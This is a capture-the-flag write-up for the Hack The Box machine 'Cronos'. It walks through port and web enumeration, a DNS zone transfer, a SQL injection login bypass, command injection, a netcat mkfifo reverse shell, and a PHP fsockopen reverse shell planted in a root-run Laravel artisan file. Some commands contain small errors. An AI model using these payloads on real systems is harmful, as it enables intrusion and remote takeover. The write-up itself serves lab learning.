Let’s get started!
This is the initial step in order to scan the open services in the machine.
COMMAND: nmap -sC -sV -O -oA cronos 10.10.10.13
As you can see from the above the nmap scan result 3 ports open !
Let’s open the webpage.
We got the default Apache2 page !
Since we only get a default page when browsing to the page using the machine’s IP address, we may want to consider that there could be virtual host routing in play. If we edit our /etc/hosts file to add the machine’s name cronos.htb and then revisit the page we now get a different page:
COMMAND: echo “10.10.10.13 cronos.htb” > /etc/hosts
Let’s revisit the page again!
The server is running laravel framework and we can do the further enumeration with nikto and gobuster.
root@exp1o1t9r:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large -directories.txt Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart) [+] Url: http://cronos.htb [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s 2020-1-23 13:14:41 Starting gobuster /js (Status: 301) /css (Status: 301) /server-status (Status: 403)
root@exp1o1t9r:~/htb/machines/cronos-10.10.10.13# nikto -h cronos.htb - Nikto v2.1.6 Target IP: 10.10.10.13 Target Hostname: cronos.htb Target Port: 80 + Start Time: 2020-1-23 13:15:02 (GMT-5) Server: Apache/2.4.18 (Ubuntu) The anti-clickjacking X-Frame-Options header is not present. The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type Cookie XSRF-TOKEN created without the httponly flag No CGI Directories found (use '-C all' to force check all possible dirs) Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. Allowed HTTP Methods: GET, HEAD OSVDB-3092: /web.config: ASP config file is accessible. OSVDB-3268: /css/: Directory indexing found. OSVDB-3092: /css/: This might be interesting… OSVDB-3233: /icons/README: Apache default file found. 7785 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2019-12-25 13:20:45 (GMT-5) (343 seconds) 1 host(s) tested
Since we’re not seeing anything jump out at us right away, now would be a good time to take a step back and review the other services we haven’t enumerated yet. Let’s explore DNS and see if we can do a zone transfer for the cronos.htb domain.
COMMAND: host -l cronos.htb 10.10.10.13
As from the above results , we need to add all the hosts in out hosts file.
echo “10.10.10.13 admin.cronos.htb” > /etc/hosts
echo “10.10.10.13 ns1.cronos.htb” > /etc/hosts
echo “10.10.10.13 www.cronos.htb” > /etc/hosts
admin.cronos.htb looks very promising…
/etc/hosts, let’s navigate to it:
A login page, lets attempt to bypass using SQL Injection
admin' or '1'='1
We got logined successfully and we will try use command injection and execute linux commands !
Command Injection is possible,So we will use a reverse shell python one-liner:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 1234 >/tmp/f
BOOM! we got the shell !
Let’s take a look at crontab as the machine name is CRONOS!!
COMMAND: cat /etc/crontab
By checking the crontab we know that artisan is running as root!
Let’s use the artisan and get the root shell:)
We need to modify the artisan file with the reverse shell and setup netcat listener as shown below image!
echo ''<?php $sock=fsockopen("10.10.14.30",9999);exec("/bin/sh -i &3 2>&3"); ?>' > /var/www/laravel/artisan nc -nlvp 9999
Finally got the root shell and pwned the root flag:)
If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r